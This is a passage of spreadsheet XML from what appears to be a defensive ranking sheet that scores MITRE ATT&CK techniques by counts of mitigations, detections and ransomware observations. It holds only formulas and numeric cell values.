      <c r="AT153" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU15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54" spans="1:47">
      <c r="A154" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.7380952380952373E-2</v>
      </c>
      <c r="B154" s="25">
        <f>SUM(H154,M154,V154)*(1+SUM(AE154,AG154,AI154,AK154,AM154))</f>
        <v>0.57380952380952377</v>
      </c>
      <c r="C154" s="25" t="s">
        <v>699</v>
      </c>
      <c r="D154" s="25" t="s">
        <v>700</v>
      </c>
      <c r="E154" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F154" s="51">
        <v>3</v>
      </c>
      <c r="G154" s="51">
        <v>2</v>
      </c>
      <c r="H154" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.25</v>
      </c>
      <c r="I154">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.3</v>
      </c>
      <c r="J154">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.3</v>
      </c>
      <c r="K154">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.2</v>
      </c>
      <c r="L154">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="M154" s="25">
        <v>0</v>
      </c>
      <c r="N154" s="51">
        <v>0</v>
      </c>
      <c r="O154" s="51">
        <v>1</v>
      </c>
      <c r="P154" s="51">
        <v>3</v>
      </c>
      <c r="Q154" s="51">
        <v>0</v>
      </c>
      <c r="R154" s="52" t="s">
        <v>701</v>
      </c>
      <c r="S154" s="51">
        <v>13</v>
      </c>
      <c r="T154" s="52" t="s">
        <v>702</v>
      </c>
      <c r="U154" s="51">
        <v>19</v>
      </c>
      <c r="V154" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.32380952380952382</v>
      </c>
      <c r="W154">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>32</v>
      </c>
      <c r="X154">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.58181818181818179</v>
      </c>
      <c r="Y154">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.58181818181818179</v>
      </c>
      <c r="Z154">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>4</v>
      </c>
      <c r="AA154">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.04</v>
      </c>
      <c r="AB154">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.04</v>
      </c>
      <c r="AC154" s="29" t="s">
        <v>703</v>
      </c>
      <c r="AD154" s="25" t="str" cm="1">
        <f t="array" ref="AD154">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC154)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE154" s="25">
        <f>IF(AD154="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF154" s="25" t="str" cm="1">
        <f t="array" ref="AF154">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC154)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG154" s="25">
        <f>IF(AF154="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH154" s="25" t="str" cm="1">
        <f t="array" ref="AH154">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC154)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI154" s="25">
        <f>IF(AH154="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ154" s="25" t="str" cm="1">
        <f t="array" ref="AJ154">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC154)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK154" s="25">
        <f>IF(AJ154="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL154" s="25" t="str" cm="1">
        <f t="array" ref="AL154">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC154)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AM154" s="25">
        <f>IF(AL154="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN154" s="52">
        <v>0</v>
      </c>
      <c r="AO154" s="51">
        <v>0</v>
      </c>
      <c r="AP154" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.7380952380952373E-2</v>
      </c>
      <c r="AQ154" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.19126984126984126</v>
      </c>
      <c r="AR154" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.19126984126984126</v>
      </c>
      <c r="AS154" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT154" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU15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55" spans="1:47">
      <c r="A155" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>8.9700000000000002E-2</v>
      </c>
      <c r="B155" s="25">
        <f>SUM(H155,M155,V155)*(1+SUM(AE155,AG155,AI155,AK155,AM155))</f>
        <v>0.56366666666666676</v>
      </c>
      <c r="C155" s="25" t="s">
        <v>704</v>
      </c>
      <c r="D155" s="25" t="s">
        <v>343</v>
      </c>
      <c r="E155" s="25" t="s">
        <v>705</v>
      </c>
      <c r="F155" s="51">
        <v>1</v>
      </c>
      <c r="G155" s="51">
        <v>1</v>
      </c>
      <c r="H155" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I155">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J155">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K155">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L155">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M155" s="25">
        <v>0</v>
      </c>
      <c r="N155" s="51">
        <v>0</v>
      </c>
      <c r="O155" s="51">
        <v>6</v>
      </c>
      <c r="P155" s="51">
        <v>0</v>
      </c>
      <c r="Q155" s="51">
        <v>0</v>
      </c>
      <c r="R155" s="52" t="s">
        <v>706</v>
      </c>
      <c r="S155" s="51">
        <v>16</v>
      </c>
      <c r="T155" s="52" t="s">
        <v>707</v>
      </c>
      <c r="U155" s="51">
        <v>15</v>
      </c>
      <c r="V155" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.32380952380952382</v>
      </c>
      <c r="W155">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>31</v>
      </c>
      <c r="X155">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.5636363636363636</v>
      </c>
      <c r="Y155">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.5636363636363636</v>
      </c>
      <c r="Z155">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>6</v>
      </c>
      <c r="AA155">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.06</v>
      </c>
      <c r="AB155">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.06</v>
      </c>
      <c r="AC155" s="29" t="s">
        <v>639</v>
      </c>
      <c r="AD155" s="25" t="str" cm="1">
        <f t="array" ref="AD155">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC155)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE155" s="25">
        <f>IF(AD155="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF155" s="25" t="str" cm="1">
        <f t="array" ref="AF155">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC155)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG155" s="25">
        <f>IF(AF155="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH155" s="25" t="str" cm="1">
        <f t="array" ref="AH155">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC155)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI155" s="25">
        <f>IF(AH155="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ155" s="25" t="str" cm="1">
        <f t="array" ref="AJ155">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC155)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK155" s="25">
        <f>IF(AJ155="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL155" s="25" t="str" cm="1">
        <f t="array" ref="AL155">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC155)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM155" s="25">
        <f>IF(AL155="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN155" s="52">
        <v>1</v>
      </c>
      <c r="AO155" s="51">
        <v>1</v>
      </c>
      <c r="AP155" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>8.9700000000000002E-2</v>
      </c>
      <c r="AQ155" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.18788888888888891</v>
      </c>
      <c r="AR155" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.18788888888888891</v>
      </c>
      <c r="AS155" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT155" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU15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56" spans="1:47" ht="32.1">
      <c r="A156" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>8.9700000000000002E-2</v>
      </c>
      <c r="B156" s="25">
        <f>SUM(H156,M156,V156)*(1+SUM(AE156,AG156,AI156,AK156,AM156))</f>
        <v>0.56366666666666665</v>
      </c>
      <c r="C156" s="25" t="s">
        <v>708</v>
      </c>
      <c r="D156" s="25" t="s">
        <v>353</v>
      </c>
      <c r="E156" s="25" t="s">
        <v>709</v>
      </c>
      <c r="F156" s="51">
        <v>1</v>
      </c>
      <c r="G156" s="51">
        <v>1</v>
      </c>
      <c r="H156" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I156">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J156">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K156">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L156">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M156" s="25">
        <v>0</v>
      </c>
      <c r="N156" s="51">
        <v>5</v>
      </c>
      <c r="O156" s="51">
        <v>1</v>
      </c>
      <c r="P156" s="51">
        <v>3</v>
      </c>
      <c r="Q156" s="51">
        <v>1</v>
      </c>
      <c r="R156" s="52" t="s">
        <v>710</v>
      </c>
      <c r="S156" s="51">
        <v>10</v>
      </c>
      <c r="T156" s="51" t="s">
        <v>711</v>
      </c>
      <c r="U156" s="51">
        <v>19</v>
      </c>
      <c r="V156" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.32380952380952377</v>
      </c>
      <c r="W156">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>29</v>
      </c>
      <c r="X156">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.52727272727272723</v>
      </c>
      <c r="Y156">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.52727272727272723</v>
      </c>
      <c r="Z156">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>10</v>
      </c>
      <c r="AA156">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.1</v>
      </c>
      <c r="AB156">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.1</v>
      </c>
      <c r="AC156" s="29" t="s">
        <v>621</v>
      </c>
      <c r="AD156" s="25" t="str" cm="1">
        <f t="array" ref="AD156">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC156)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE156" s="25">
        <f>IF(AD156="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF156" s="25" t="str" cm="1">
        <f t="array" ref="AF156">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC156)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG156" s="25">
        <f>IF(AF156="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH156" s="25" t="str" cm="1">
        <f t="array" ref="AH156">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC156)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI156" s="25">
        <f>IF(AH156="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ156" s="25" t="str" cm="1">
        <f t="array" ref="AJ156">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC156)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK156" s="25">
        <f>IF(AJ156="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL156" s="25" t="str" cm="1">
        <f t="array" ref="AL156">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC156)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM156" s="25">
        <f>IF(AL156="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN156" s="60">
        <v>1</v>
      </c>
      <c r="AO156" s="51">
        <v>1</v>
      </c>
      <c r="AP156" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>8.9700000000000002E-2</v>
      </c>
      <c r="AQ156" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.18788888888888888</v>
      </c>
      <c r="AR156" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.18788888888888888</v>
      </c>
      <c r="AS156" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT156" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU15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57" spans="1:47" ht="48">
      <c r="A157" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>8.9066666666666683E-2</v>
      </c>
      <c r="B157" s="25">
        <f>SUM(H157,M157,V157)*(1+SUM(AE157,AG157,AI157,AK157,AM157))</f>
        <v>0.55733333333333346</v>
      </c>
      <c r="C157" s="25" t="s">
        <v>712</v>
      </c>
      <c r="D157" s="25" t="s">
        <v>202</v>
      </c>
      <c r="E157" s="25" t="s">
        <v>713</v>
      </c>
      <c r="F157" s="51">
        <v>1</v>
      </c>
      <c r="G157" s="51">
        <v>1</v>
      </c>
      <c r="H157" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I157">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J157">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K157">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L157">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M157" s="25">
        <v>0</v>
      </c>
      <c r="N157" s="51">
        <v>0</v>
      </c>
      <c r="O157" s="51">
        <v>0</v>
      </c>
      <c r="P157" s="51">
        <v>3</v>
      </c>
      <c r="Q157" s="51">
        <v>0</v>
      </c>
      <c r="R157" s="52" t="s">
        <v>714</v>
      </c>
      <c r="S157" s="51">
        <v>14</v>
      </c>
      <c r="T157" s="52" t="s">
        <v>715</v>
      </c>
      <c r="U157" s="51">
        <v>18</v>
      </c>
      <c r="V157" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.31904761904761908</v>
      </c>
      <c r="W157">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>32</v>
      </c>
      <c r="X157">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.58181818181818179</v>
      </c>
      <c r="Y157">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.58181818181818179</v>
      </c>
      <c r="Z157">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>3</v>
      </c>
      <c r="AA157">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.03</v>
      </c>
      <c r="AB157">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.03</v>
      </c>
      <c r="AC157" s="29" t="s">
        <v>716</v>
      </c>
      <c r="AD157" s="25" t="str" cm="1">
        <f t="array" ref="AD157">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC157)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE157" s="25">
        <f>IF(AD157="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF157" s="25" t="str" cm="1">
        <f t="array" ref="AF157">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC157)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG157" s="25">
        <f>IF(AF157="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH157" s="25" t="str" cm="1">
        <f t="array" ref="AH157">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC157)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI157" s="25">
        <f>IF(AH157="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ157" s="25" t="str" cm="1">
        <f t="array" ref="AJ157">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC157)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK157" s="25">
        <f>IF(AJ157="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL157" s="25" t="str" cm="1">
        <f t="array" ref="AL157">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC157)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM157" s="25">
        <f>IF(AL157="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN157" s="52">
        <v>1</v>
      </c>
      <c r="AO157" s="51">
        <v>1</v>
      </c>
      <c r="AP157" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>8.9066666666666683E-2</v>
      </c>
      <c r="AQ157" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.18577777777777782</v>
      </c>
      <c r="AR157" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.18577777777777782</v>
      </c>
      <c r="AS157" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT157" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU15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58" spans="1:47">
      <c r="A158" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.0201904761904767E-2</v>
      </c>
      <c r="B158" s="25">
        <f>SUM(H158,M158,V158)*(1+SUM(AE158,AG158,AI158,AK158,AM158))</f>
        <v>0.5020190476190477</v>
      </c>
      <c r="C158" s="25" t="s">
        <v>717</v>
      </c>
      <c r="D158" s="25" t="s">
        <v>348</v>
      </c>
      <c r="E158" s="25" t="s">
        <v>718</v>
      </c>
      <c r="F158" s="51">
        <v>1</v>
      </c>
      <c r="G158" s="51">
        <v>1</v>
      </c>
      <c r="H158" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I158">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J158">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K158">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L158">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M158" s="25">
        <v>0</v>
      </c>
      <c r="N158" s="51">
        <v>0</v>
      </c>
      <c r="O158" s="51">
        <v>3</v>
      </c>
